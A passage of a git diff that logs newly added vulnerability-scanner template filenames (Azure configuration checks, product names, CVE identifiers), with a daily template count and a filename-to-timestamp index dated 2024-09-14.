+| azure-keyvault-update-unalerted.yaml |
+| azure-redis-tls-version-outdated.yaml |
+| clickshare_cs-100_huddle_firmware.yaml |
+| rundeck.yaml |
+| crmeb.yaml |
+| remote_support.yaml |
+| azure-vmss-auto-repairs-disabled.yaml |
+| azure-appservice-remote-debugging-enabled.yaml |
+| pdf-thumbnail-generator.yaml |
+| azure-sql-tde-not-enabled.yaml |
+| azure-postgresql-storage-autogrow-disabled.yaml |
+| azure-cosmosdb-auto-failover-missing.yaml |
+| azure-aks-managed-identity-unassigned.yaml |
+| azure-nsg-rule-update-unalerted.yaml |
+| gnuboard5.yaml |
+| sigma_wide.yaml |
+| delicate.yaml |
+| wechat.yaml |
+| azure-cosmosdb-default-network-access-unrestricted.yaml |
+| vec40g.yaml |
+| azure-security-policy-update-unalerted.yaml |
+| cs141.yaml |
+| azure-sql-fw-rule-unalerted.yaml |
+| webex_meetings_online.yaml |
+| leira-cron-jobs.yaml |
+| webpagetest.yaml |
+| azure-appservice-client-cert-disabled.yaml |
+| azure-appservice-insights-not-enabled.yaml |
+| azure-diagnostic-categories-misconfigured.yaml |
+| azure-policy-not-allowed-types-unassigned.yaml |
+| azure-blob-lifecycle-not-enabled.yaml |
+| azure-functionapp-system-assigned-missing.yaml |
+| sangfor.yaml |
+| azure-vmss-health-monitoring-missing.yaml |
+| tamronos.yaml |
+| aj-report.yaml |
+| azure-aks-not-user-assigned.yaml |
+| magnolia_cms.yaml |
+| usg1000_firmware.yaml |
+| azure-sql-mi-tls-version-outdated.yaml |
+| azure-blob-immutable-not-enabled.yaml |
+| azure-postgres-log-disconnections-disabled.yaml |
+| azure-security-solution-delete-unalerted.yaml |
+| azure-security-solutions-update-unalerted.yaml |
+| azure-blob-service-logging-disabled.yaml |
+| telerik_report_server.yaml |
+| azure-vm-endpoint-protection-missing.yaml |
+| prison_management_system.yaml |
+| azure-storage-trusted-access-disabled.yaml |
+| azkaban.yaml |
+| azure-keyvault-resource-lock-check.yaml |
+| elfinder.yaml |
+| cloud_foundation.yaml |
+| azure-mfa-not-enabled-privileged-users.yaml |
+| notebook.yaml |
+| azure-synapse-sqlpool-tde-disabled.yaml |
+| azure-storage-cmk-not-used.yaml |
+| rg-uac_firmware.yaml |
+| azure-public-ip-update-unalerted.yaml |
+| azure-nic-ip-forwarding-check.yaml |
+| azure-sql-db-update-unalerted.yaml |
+| azure-storage-secure-transfer.yaml |
+| azure-aks-api-version-not-latest.yaml |
+| azure-vmss-termination-notif-disabled.yaml |
+| office_web_apps_server.yaml |
+| azure-aks-api-unrestricted.yaml |
+| azure-database-tier-cmk-absent.yaml |
+| azure-vm-unapproved-image.yaml |
+| self_service.yaml |
+| azure-vm-boot-disk-unencrypted.yaml |
+| rt-n16.yaml |
+| azure-storage-public-access.yaml |
+| azure-vmss-empty-unattached.yaml |
+| unifi_network_application.yaml |
+| azure-apim-tls-config-weak.yaml |
+| azure-apim-https-enforcement-missing.yaml |
+| azure-sql-database-rename-unalerted.yaml |
+| azure-postgres-allow-azure-services-disabled.yaml |
+| experience_manager_cloud_service.yaml |
+| azure-aks-cni-not-configured.yaml |
+| azure-iam-role-resource-lock-unassigned.yaml |
+| azure-storage-cross-tenant-replication-disabled.yaml |
+| ollama.yaml |
+| integrated_management_module.yaml |
+| cdg.yaml |
+| azure-aks-use-private-kv.yaml |
+| azure-disk-encryption-unattached-volumes.yaml |
+| wp-test-email.yaml |
+| o2oa.yaml |
+| azure-storage-blob-public-access.yaml |
+| azure-appservice-backup-retention-missing.yaml |
+| azure-vnet-ddos-protection.yaml |
+| triton-lite.yaml |
+| floating-contact.yaml |
+| custom-post-limits.yaml |
+| datahub.yaml |
+| azure-storage-network-unrestricted.yaml |
+| openmediavault.yaml |
+| dzzoffice.yaml |
+| scx-6555n.yaml |
+| azure-defender-auto-provisioning-disabled.yaml |
+| whatsup_gold.yaml |
+| endpoint_protection_manager.yaml |
+| cercopitheque.yaml |
+| azure-storage-encryption-missing.yaml |
+| azure-openai-private-endpoints-unconfigured.yaml |
+| azure-vm-accelerated-networking-disabled.yaml |
+| e-cology.yaml |
+| manageengine_netflow_analyzer.yaml |
+| azure-apim-http2-not-enabled.yaml |
+| azure-postgres-double-encryption-disabled.yaml |
+| apeosport-v_c3375.yaml |
+| azure-functionapp-vnet-integration-missing.yaml |
+| azure-appservice-entra-id-missing.yaml |
+| dir-845l.yaml |
+| wn604.yaml |
+| azure-apim-user-assigned-id-not-used.yaml |
+| azure-keyvault-trusted-ms-unrestricted.yaml |
+| karaf.yaml |
+| azure-storage-static-website-review.yaml |
+| azure-sql-mi-tde-cmk-not-enabled.yaml |
+| azure-storage-byok-not-used.yaml |
+| azure-keyvault-certificate-insufficient-autorenew.yaml |
+| neighborly.yaml |
+| azure-appservice-tls-latest-version-missing.yaml |
+| azure-appservice-https-only-not-enforced.yaml |
+| argo_cd.yaml |
+| azure-vmss-load-balancer-unassociated.yaml |
+| azure-vm-trusted-launch-disabled.yaml |
+| azure-monitor-diagnostic-unrestricted.yaml |
+| azure-nsg-delete-unalerted.yaml |
+| yeswiki.yaml |
+| azure-aks-network-contrib-unassigned.yaml |
+| azure-openai-managed-identity-not-used.yaml |
+| camera_firmware.yaml |
+| etl3100.yaml |
+| voyager.yaml |
+| aura_utility_services.yaml |
+| openshift_origin.yaml |
+| ns-asg.yaml |
+| dataease.yaml |
+| azure-apim-resource-logs-not-configured.yaml |
+| chatgpt_web.yaml |
+| azure-policy-assignment-create-alert-missing.yaml |
+| azure-storage-account-delete-unalerted.yaml |
+| azure-servicebus-tls-version-outdated.yaml |
+| azure-aks-rbac-unconfigured.yaml |
+| azure-vm-performance-diagnostics-unenabled.yaml |
+| azure-nsg-create-update-unalerted.yaml |
+| azure-log-profile-all-activities.yaml |
+| azure-postgres-log-checkpoints-disabled.yaml |
+| azure-vm-accelerated-networking-not-enabled.yaml |
+| xenmobile_server.yaml |
+| activemq_apollo.yaml |
+| peoplesoft_enterprise_peopletools.yaml |
+| rg-uac.yaml |
+| azure-vmss-zone-redundancy-missing.yaml |
+| versa_operating_system.yaml |
+| lucas-string-replace.yaml |
+| hg532e.yaml |
+| azure-keyvault-cert-transparency-missing.yaml |
+| azure-mysql-db-update-unalerted.yaml |
+| azure-vm-web-tier-disk-unencrypted.yaml |
+| connection_broker.yaml |
+| azure-appservice-ftps-only-not-enabled.yaml |
+| azure-vm-poweroff-unalerted.yaml |
+| azure-functionapp-appinsights-missing.yaml |
+| beauty.yaml |
+| raidenmaild.yaml |
+| azure-appservice-backup-not-enabled.yaml |
+| exit-notifier.yaml |
+| tweaker5.yaml |
+| azure-app-tier-cmk-untagged.yaml |
+| azure-vm-byok-disk-volumes-not-enabled.yaml |
+| azure-policy-assignment-delete-unalerted.yaml |
+| secure-downloads.yaml |
+| framework.yaml |
+| turbomeeting.yaml |
+| azure-openai-public-access-disabled.yaml |
+| azure-sql-tde-cmk-not-used.yaml |
+| azure-key-vault-delete-unalerted.yaml |
+| azure-budget-alerts-missing.yaml |
+| ranger.yaml |
+| azure-postgresql-geo-backup-disabled.yaml |
+| azure-nsg-rule-delete-unalerted.yaml |
+| next-gen_application_firewall.yaml |
+| hybris.yaml |
+| calibre.yaml |
+| azure-apim-system-assigned-identity-unconfigured.yaml |
+| tinyfilemanager.yaml |
+| azure-sql-delete-db-unalerted.yaml |
+| azure-functionapp-user-assigned-id-missing.yaml |
+| azure-vm-jit-access-not-enabled.yaml |
+| azure-vm-boot-diagnostics-not-enabled.yaml |
+| azure-network-watcher.yaml |
+| azure-aks-entra-id-unintegrated.yaml |
+| zentao.yaml |
+| azure-appservice-ftp-deployment-disabled.yaml |
+| CVE-2023-38992.yaml |
diff --git a/data.json b/data.json
index c804588914..ecf9000041 100644
--- a/data.json
+++ b/data.json
@@ -188,5 +188,6 @@
 "2024-09-10": 41800,
 "2024-09-11": 41825,
 "2024-09-12": 41851,
- "2024-09-13": 41783
+ "2024-09-13": 41783,
+ "2024-09-14": 42206
 }
\ No newline at end of file
diff --git a/data1.json b/data1.json
index bfd9693414..4d69eb8110 100644
--- a/data1.json
+++ b/data1.json
@@ -49535,5 +49535,355 @@ "setPreferences-xss.yaml": "2024-09-13 02:22:33", "contact-form-7-plugin.yaml": "2024-09-13 02:22:33", "SquirrelMail.yaml": "2024-09-13 02:22:33", - "cve-2020-11547.yaml": "2024-09-13 02:22:33" + "cve-2020-11547.yaml": "2024-09-13 02:22:33", + "CVE-2024-8730.yaml": "2024-09-14 02:20:23", + "CVE-2024-7888.yaml": "2024-09-14 02:20:23", + "CVE-2024-5870.yaml": "2024-09-14 02:20:23", + "CVE-2024-8522.yaml": "2024-09-14 02:20:23", + "CVE-2024-3899.yaml": "2024-09-14 02:20:23", + "CVE-2024-45625.yaml": "2024-09-14 02:20:23", + "CVE-2024-5628.yaml": "2024-09-14 02:20:23", + "CVE-2024-8269.yaml": "2024-09-14 02:20:23", + "CVE-2024-6792.yaml": "2024-09-14 02:20:23", + "CVE-2024-8732.yaml": "2024-09-14 02:20:23", + "CVE-2024-6889.yaml": "2024-09-14 02:20:23", + "CVE-2024-45270.yaml": "2024-09-14 02:20:23", + "CVE-2024-8031.yaml": "2024-09-14 02:20:23", + "CVE-2024-7132.yaml": "2024-09-14 02:20:23", + "CVE-2024-8663.yaml": "2024-09-14 02:20:23", + "CVE-2024-7423.yaml": "2024-09-14 02:20:23", + "CVE-2024-6910.yaml": "2024-09-14 02:20:23", + "CVE-2024-8622.yaml": "2024-09-14 02:20:23", + "CVE-2024-8747.yaml": "2024-09-14 02:20:23", + "CVE-2024-6544.yaml": "2024-09-14 02:20:23", + "CVE-2024-8734.yaml": "2024-09-14 02:20:23", + "CVE-2024-7354.yaml": "2024-09-14 02:20:23", + "CVE-2024-8665.yaml": "2024-09-14 02:20:23", + "CVE-2024-8664.yaml": "2024-09-14 02:20:23", + "CVE-2024-37084.yaml": "2024-09-14 02:20:23", + "CVE-2024-8656.yaml": "2024-09-14 02:20:23", + "CVE-2024-7955.yaml": "2024-09-14 02:20:23", + "CVE-2024-8731.yaml": "2024-09-14 02:20:23", + "CVE-2024-6888.yaml": "2024-09-14 02:20:23", + "CVE-2024-5867.yaml": "2024-09-14 02:20:23", + "CVE-2024-7716.yaml": "2024-09-14 02:20:23", + "CVE-2024-45429.yaml": "2024-09-14 02:20:23", + "CVE-2024-45269.yaml": "2024-09-14 02:20:23", + "CVE-2024-5561.yaml": "2024-09-14 02:20:23", + "CVE-2024-41667.yaml": "2024-09-14 02:20:23", + "CVE-2024-5789.yaml": "2024-09-14 02:20:23", + "CVE-2024-8742.yaml": 
"2024-09-14 02:20:23", + "CVE-2024-7891.yaml": "2024-09-14 02:20:23", + "CVE-2024-8242.yaml": "2024-09-14 02:20:23", + "CVE-2024-3673.yaml": "2024-09-14 02:20:23", + "CVE-2024-8529.yaml": "2024-09-14 02:20:23", + "CVE-2024-23167.yaml": "2024-09-14 02:20:23", + "CVE-2024-5869.yaml": "2024-09-14 02:20:23", + "CVE-2024-5567.yaml": "2024-09-14 02:20:23", + "CVE-2024-8714.yaml": "2024-09-14 02:20:23", + "CVE-2024-5884.yaml": "2024-09-14 02:20:23", + "CVE-2024-6020.yaml": "2024-09-14 02:20:23", + "CVE-2024-8737.yaml": "2024-09-14 02:20:23", + "CVE-2022-2446.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-connections-disabled.yaml": "2024-09-14 02:20:23", + "azure-apim-public-access-disabled.yaml": "2024-09-14 02:20:23", + "azure-sql-auditing-disabled.yaml": "2024-09-14 02:20:23", + "application_security_gateway.yaml": "2024-09-14 02:20:23", + "aruba_instant.yaml": "2024-09-14 02:20:23", + "jbpm.yaml": "2024-09-14 02:20:23", + "leira-roles.yaml": "2024-09-14 02:20:23", + "azure-storage-account-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-entra-id-guest-users-unmonitored.yaml": "2024-09-14 02:20:23", + "azure-storage-table-logging-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-overly-permissive-sap.yaml": "2024-09-14 02:20:23", + "azure-storage-private-endpoint-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-keyvault-recoverability-unconfigured.yaml": "2024-09-14 02:20:23", + "vrealize_operations_manager.yaml": "2024-09-14 02:20:23", + "azure-vm-entra-id-unenabled.yaml": "2024-09-14 02:20:23", + "shopxo.yaml": "2024-09-14 02:20:23", + "azure-lb-create-update-missing.yaml": "2024-09-14 02:20:23", + "fortiportal.yaml": "2024-09-14 02:20:23", + "azure-sql-va-emails-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-delete-unalerted.yaml": "2024-09-14 02:20:23", + "bagisto.yaml": "2024-09-14 02:20:23", + "3cx.yaml": "2024-09-14 02:20:23", + "azure-postgres-connection-throttling-disabled.yaml": "2024-09-14 02:20:23", + "nifi.yaml": "2024-09-14 
02:20:23", + "azure-functionapp-public-exposure.yaml": "2024-09-14 02:20:23", + "pelco_videoxpert.yaml": "2024-09-14 02:20:23", + "azure-postgresql-ssl-enforcement.yaml": "2024-09-14 02:20:23", + "azure-storage-queue-logging-disabled.yaml": "2024-09-14 02:20:23", + "hg255s.yaml": "2024-09-14 02:20:23", + "cloudstack.yaml": "2024-09-14 02:20:23", + "s14.yaml": "2024-09-14 02:20:23", + "azure-keyvault-network-unrestricted.yaml": "2024-09-14 02:20:23", + "office_anywhere.yaml": "2024-09-14 02:20:23", + "azure-vm-tags-schema-noncompliant.yaml": "2024-09-14 02:20:23", + "seeddms.yaml": "2024-09-14 02:20:23", + "azure-aks-kubernetes-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-app-tier-vm-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "hue.yaml": "2024-09-14 02:20:23", + "azure-appservice-auth-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-create-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-vm-deallocate-unalerted.yaml": "2024-09-14 02:20:23", + "flexnet_publisher.yaml": "2024-09-14 02:20:23", + "azure-redis-nonssl-port-disabled.yaml": "2024-09-14 02:20:23", + "azure-lb-unused.yaml": "2024-09-14 02:20:23", + "fumengyun-sqli.yaml": "2024-09-14 02:20:23", + "azure-diag-logs-not-enabled.yaml": "2024-09-14 02:20:23", + "froxlor.yaml": "2024-09-14 02:20:23", + "azure-sql-failover-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-keyvault-audit-not-enabled.yaml": "2024-09-14 02:20:23", + "tooljet.yaml": "2024-09-14 02:20:23", + "azure-appservice-always-on-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-ssh-auth-type.yaml": "2024-09-14 02:20:23", + "azure-vmss-auto-os-upgrade-missing.yaml": "2024-09-14 02:20:23", + "azure-openai-cmk-not-enabled.yaml": "2024-09-14 02:20:23", + "steve.yaml": "2024-09-14 02:20:23", + "azure-functionapp-access-keys-missing.yaml": "2024-09-14 02:20:23", + "wazuh.yaml": "2024-09-14 02:20:23", + "xnat.yaml": "2024-09-14 02:20:23", + "azure-blob-anonymous-access-disabled.yaml": "2024-09-14 02:20:23", + 
"azure-servicebus-public-access-disabled.yaml": "2024-09-14 02:20:23", + "logstash.yaml": "2024-09-14 02:20:23", + "azure-blob-soft-delete-disabled.yaml": "2024-09-14 02:20:23", + "azure-functionapp-admin-privileges.yaml": "2024-09-14 02:20:23", + "kio_firmware.yaml": "2024-09-14 02:20:23", + "azure-postgresql-db-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-custom-admin-role-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-delete-lb-alert-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-unmanaged-disk-volumes.yaml": "2024-09-14 02:20:23", + "data_science_studio.yaml": "2024-09-14 02:20:23", + "kiwi_tcms.yaml": "2024-09-14 02:20:23", + "azure-vm-managed-identity-unassigned.yaml": "2024-09-14 02:20:23", + "vrealize_operations.yaml": "2024-09-14 02:20:23", + "vpn.yaml": "2024-09-14 02:20:23", + "x-ui.yaml": "2024-09-14 02:20:23", + "netman_204_firmware.yaml": "2024-09-14 02:20:23", + "azure-public-ip-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-keyvault-cert-keytype-unapproved.yaml": "2024-09-14 02:20:23", + "azure-vm-guest-diagnostics-unenabled.yaml": "2024-09-14 02:20:23", + "g0.yaml": "2024-09-14 02:20:23", + "azure-vmss-public-ip-disabled.yaml": "2024-09-14 02:20:23", + "t24.yaml": "2024-09-14 02:20:23", + "azure-vm-standard-ssd-required.yaml": "2024-09-14 02:20:23", + "kingsoft_antivirus.yaml": "2024-09-14 02:20:23", + "unified_communications_domain_manager.yaml": "2024-09-14 02:20:23", + "azure-search-service-managed-identity-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-min-tls-version.yaml": "2024-09-14 02:20:23", + "network_security_manager.yaml": "2024-09-14 02:20:23", + "ckan.yaml": "2024-09-14 02:20:23", + "vcenter_server.yaml": "2024-09-14 02:20:23", + "traccar.yaml": "2024-09-14 02:20:23", + "dns-320l.yaml": "2024-09-14 02:20:23", + "azure-custom-owner-role-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-postgresql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-apim-nv-plaintext-exposure.yaml": 
"2024-09-14 02:20:23", + "azure-keyvault-ssl-autorenewal-missing.yaml": "2024-09-14 02:20:23", + "email-obfuscate-shortcode.yaml": "2024-09-14 02:20:23", + "senayan_library_management_system.yaml": "2024-09-14 02:20:23", + "azure-appservice-http2-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-db-mysql-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-duration-disabled.yaml": "2024-09-14 02:20:23", + "streampipes.yaml": "2024-09-14 02:20:23", + "websphere.yaml": "2024-09-14 02:20:23", + "azure-keyvault-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-redis-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "clickshare_cs-100_huddle_firmware.yaml": "2024-09-14 02:20:23", + "rundeck.yaml": "2024-09-14 02:20:23", + "crmeb.yaml": "2024-09-14 02:20:23", + "remote_support.yaml": "2024-09-14 02:20:23", + "azure-vmss-auto-repairs-disabled.yaml": "2024-09-14 02:20:23", + "azure-appservice-remote-debugging-enabled.yaml": "2024-09-14 02:20:23", + "pdf-thumbnail-generator.yaml": "2024-09-14 02:20:23", + "azure-sql-tde-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgresql-storage-autogrow-disabled.yaml": "2024-09-14 02:20:23", + "azure-cosmosdb-auto-failover-missing.yaml": "2024-09-14 02:20:23", + "azure-aks-managed-identity-unassigned.yaml": "2024-09-14 02:20:23", + "azure-nsg-rule-update-unalerted.yaml": "2024-09-14 02:20:23", + "gnuboard5.yaml": "2024-09-14 02:20:23", + "sigma_wide.yaml": "2024-09-14 02:20:23", + "delicate.yaml": "2024-09-14 02:20:23", + "wechat.yaml": "2024-09-14 02:20:23", + "azure-cosmosdb-default-network-access-unrestricted.yaml": "2024-09-14 02:20:23", + "vec40g.yaml": "2024-09-14 02:20:23", + "azure-security-policy-update-unalerted.yaml": "2024-09-14 02:20:23", + "cs141.yaml": "2024-09-14 02:20:23", + "azure-sql-fw-rule-unalerted.yaml": "2024-09-14 02:20:23", + "webex_meetings_online.yaml": "2024-09-14 02:20:23", + "leira-cron-jobs.yaml": "2024-09-14 02:20:23", + "webpagetest.yaml": "2024-09-14 02:20:23", + 
"azure-appservice-client-cert-disabled.yaml": "2024-09-14 02:20:23", + "azure-appservice-insights-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-diagnostic-categories-misconfigured.yaml": "2024-09-14 02:20:23", + "azure-policy-not-allowed-types-unassigned.yaml": "2024-09-14 02:20:23", + "azure-blob-lifecycle-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-functionapp-system-assigned-missing.yaml": "2024-09-14 02:20:23", + "sangfor.yaml": "2024-09-14 02:20:23", + "azure-vmss-health-monitoring-missing.yaml": "2024-09-14 02:20:23", + "tamronos.yaml": "2024-09-14 02:20:23", + "aj-report.yaml": "2024-09-14 02:20:23", + "azure-aks-not-user-assigned.yaml": "2024-09-14 02:20:23", + "magnolia_cms.yaml": "2024-09-14 02:20:23", + "usg1000_firmware.yaml": "2024-09-14 02:20:23", + "azure-sql-mi-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-blob-immutable-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-disconnections-disabled.yaml": "2024-09-14 02:20:23", + "azure-security-solution-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-security-solutions-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-blob-service-logging-disabled.yaml": "2024-09-14 02:20:23", + "telerik_report_server.yaml": "2024-09-14 02:20:23", + "azure-vm-endpoint-protection-missing.yaml": "2024-09-14 02:20:23", + "prison_management_system.yaml": "2024-09-14 02:20:23", + "azure-storage-trusted-access-disabled.yaml": "2024-09-14 02:20:23", + "azkaban.yaml": "2024-09-14 02:20:23", + "azure-keyvault-resource-lock-check.yaml": "2024-09-14 02:20:23", + "elfinder.yaml": "2024-09-14 02:20:23", + "cloud_foundation.yaml": "2024-09-14 02:20:23", + "azure-mfa-not-enabled-privileged-users.yaml": "2024-09-14 02:20:23", + "notebook.yaml": "2024-09-14 02:20:23", + "azure-synapse-sqlpool-tde-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-cmk-not-used.yaml": "2024-09-14 02:20:23", + "rg-uac_firmware.yaml": "2024-09-14 02:20:23", + "azure-public-ip-update-unalerted.yaml": 
"2024-09-14 02:20:23", + "azure-nic-ip-forwarding-check.yaml": "2024-09-14 02:20:23", + "azure-sql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-storage-secure-transfer.yaml": "2024-09-14 02:20:23", + "azure-aks-api-version-not-latest.yaml": "2024-09-14 02:20:23", + "azure-vmss-termination-notif-disabled.yaml": "2024-09-14 02:20:23", + "office_web_apps_server.yaml": "2024-09-14 02:20:23", + "azure-aks-api-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-database-tier-cmk-absent.yaml": "2024-09-14 02:20:23", + "azure-vm-unapproved-image.yaml": "2024-09-14 02:20:23", + "self_service.yaml": "2024-09-14 02:20:23", + "azure-vm-boot-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "rt-n16.yaml": "2024-09-14 02:20:23", + "azure-storage-public-access.yaml": "2024-09-14 02:20:23", + "azure-vmss-empty-unattached.yaml": "2024-09-14 02:20:23", + "unifi_network_application.yaml": "2024-09-14 02:20:23", + "azure-apim-tls-config-weak.yaml": "2024-09-14 02:20:23", + "azure-apim-https-enforcement-missing.yaml": "2024-09-14 02:20:23", + "azure-sql-database-rename-unalerted.yaml": "2024-09-14 02:20:23", + "azure-postgres-allow-azure-services-disabled.yaml": "2024-09-14 02:20:23", + "experience_manager_cloud_service.yaml": "2024-09-14 02:20:23", + "azure-aks-cni-not-configured.yaml": "2024-09-14 02:20:23", + "azure-iam-role-resource-lock-unassigned.yaml": "2024-09-14 02:20:23", + "azure-storage-cross-tenant-replication-disabled.yaml": "2024-09-14 02:20:23", + "ollama.yaml": "2024-09-14 02:20:23", + "integrated_management_module.yaml": "2024-09-14 02:20:23", + "cdg.yaml": "2024-09-14 02:20:23", + "azure-aks-use-private-kv.yaml": "2024-09-14 02:20:23", + "azure-disk-encryption-unattached-volumes.yaml": "2024-09-14 02:20:23", + "wp-test-email.yaml": "2024-09-14 02:20:23", + "o2oa.yaml": "2024-09-14 02:20:23", + "azure-storage-blob-public-access.yaml": "2024-09-14 02:20:23", + "azure-appservice-backup-retention-missing.yaml": "2024-09-14 02:20:23", + 
"azure-vnet-ddos-protection.yaml": "2024-09-14 02:20:23", + "triton-lite.yaml": "2024-09-14 02:20:23", + "floating-contact.yaml": "2024-09-14 02:20:23", + "custom-post-limits.yaml": "2024-09-14 02:20:23", + "datahub.yaml": "2024-09-14 02:20:23", + "azure-storage-network-unrestricted.yaml": "2024-09-14 02:20:23", + "openmediavault.yaml": "2024-09-14 02:20:23", + "dzzoffice.yaml": "2024-09-14 02:20:23", + "scx-6555n.yaml": "2024-09-14 02:20:23", + "azure-defender-auto-provisioning-disabled.yaml": "2024-09-14 02:20:23", + "whatsup_gold.yaml": "2024-09-14 02:20:23", + "endpoint_protection_manager.yaml": "2024-09-14 02:20:23", + "cercopitheque.yaml": "2024-09-14 02:20:23", + "azure-storage-encryption-missing.yaml": "2024-09-14 02:20:23", + "azure-openai-private-endpoints-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-accelerated-networking-disabled.yaml": "2024-09-14 02:20:23", + "e-cology.yaml": "2024-09-14 02:20:23", + "manageengine_netflow_analyzer.yaml": "2024-09-14 02:20:23", + "azure-apim-http2-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgres-double-encryption-disabled.yaml": "2024-09-14 02:20:23", + "apeosport-v_c3375.yaml": "2024-09-14 02:20:23", + "azure-functionapp-vnet-integration-missing.yaml": "2024-09-14 02:20:23", + "azure-appservice-entra-id-missing.yaml": "2024-09-14 02:20:23", + "dir-845l.yaml": "2024-09-14 02:20:23", + "wn604.yaml": "2024-09-14 02:20:23", + "azure-apim-user-assigned-id-not-used.yaml": "2024-09-14 02:20:23", + "azure-keyvault-trusted-ms-unrestricted.yaml": "2024-09-14 02:20:23", + "karaf.yaml": "2024-09-14 02:20:23", + "azure-storage-static-website-review.yaml": "2024-09-14 02:20:23", + "azure-sql-mi-tde-cmk-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-storage-byok-not-used.yaml": "2024-09-14 02:20:23", + "azure-keyvault-certificate-insufficient-autorenew.yaml": "2024-09-14 02:20:23", + "neighborly.yaml": "2024-09-14 02:20:23", + "azure-appservice-tls-latest-version-missing.yaml": "2024-09-14 02:20:23", + 
"azure-appservice-https-only-not-enforced.yaml": "2024-09-14 02:20:23", + "argo_cd.yaml": "2024-09-14 02:20:23", + "azure-vmss-load-balancer-unassociated.yaml": "2024-09-14 02:20:23", + "azure-vm-trusted-launch-disabled.yaml": "2024-09-14 02:20:23", + "azure-monitor-diagnostic-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-nsg-delete-unalerted.yaml": "2024-09-14 02:20:23", + "yeswiki.yaml": "2024-09-14 02:20:23", + "azure-aks-network-contrib-unassigned.yaml": "2024-09-14 02:20:23", + "azure-openai-managed-identity-not-used.yaml": "2024-09-14 02:20:23", + "camera_firmware.yaml": "2024-09-14 02:20:23", + "etl3100.yaml": "2024-09-14 02:20:23", + "voyager.yaml": "2024-09-14 02:20:23", + "aura_utility_services.yaml": "2024-09-14 02:20:23", + "openshift_origin.yaml": "2024-09-14 02:20:23", + "ns-asg.yaml": "2024-09-14 02:20:23", + "dataease.yaml": "2024-09-14 02:20:23", + "azure-apim-resource-logs-not-configured.yaml": "2024-09-14 02:20:23", + "chatgpt_web.yaml": "2024-09-14 02:20:23", + "azure-policy-assignment-create-alert-missing.yaml": "2024-09-14 02:20:23", + "azure-storage-account-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-servicebus-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-aks-rbac-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-performance-diagnostics-unenabled.yaml": "2024-09-14 02:20:23", + "azure-nsg-create-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-log-profile-all-activities.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-checkpoints-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-accelerated-networking-not-enabled.yaml": "2024-09-14 02:20:23", + "xenmobile_server.yaml": "2024-09-14 02:20:23", + "activemq_apollo.yaml": "2024-09-14 02:20:23", + "peoplesoft_enterprise_peopletools.yaml": "2024-09-14 02:20:23", + "rg-uac.yaml": "2024-09-14 02:20:23", + "azure-vmss-zone-redundancy-missing.yaml": "2024-09-14 02:20:23", + "versa_operating_system.yaml": "2024-09-14 02:20:23", + 
"lucas-string-replace.yaml": "2024-09-14 02:20:23", + "hg532e.yaml": "2024-09-14 02:20:23", + "azure-keyvault-cert-transparency-missing.yaml": "2024-09-14 02:20:23", + "azure-mysql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-vm-web-tier-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "connection_broker.yaml": "2024-09-14 02:20:23", + "azure-appservice-ftps-only-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-vm-poweroff-unalerted.yaml": "2024-09-14 02:20:23", + "azure-functionapp-appinsights-missing.yaml": "2024-09-14 02:20:23", + "beauty.yaml": "2024-09-14 02:20:23", + "raidenmaild.yaml": "2024-09-14 02:20:23", + "azure-appservice-backup-not-enabled.yaml": "2024-09-14 02:20:23", + "exit-notifier.yaml": "2024-09-14 02:20:23", + "tweaker5.yaml": "2024-09-14 02:20:23", + "azure-app-tier-cmk-untagged.yaml": "2024-09-14 02:20:23", + "azure-vm-byok-disk-volumes-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-policy-assignment-delete-unalerted.yaml": "2024-09-14 02:20:23", + "secure-downloads.yaml": "2024-09-14 02:20:23", + "framework.yaml": "2024-09-14 02:20:23", + "turbomeeting.yaml": "2024-09-14 02:20:23", + "azure-openai-public-access-disabled.yaml": "2024-09-14 02:20:23", + "azure-sql-tde-cmk-not-used.yaml": "2024-09-14 02:20:23", + "azure-key-vault-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-budget-alerts-missing.yaml": "2024-09-14 02:20:23", + "ranger.yaml": "2024-09-14 02:20:23", + "azure-postgresql-geo-backup-disabled.yaml": "2024-09-14 02:20:23", + "azure-nsg-rule-delete-unalerted.yaml": 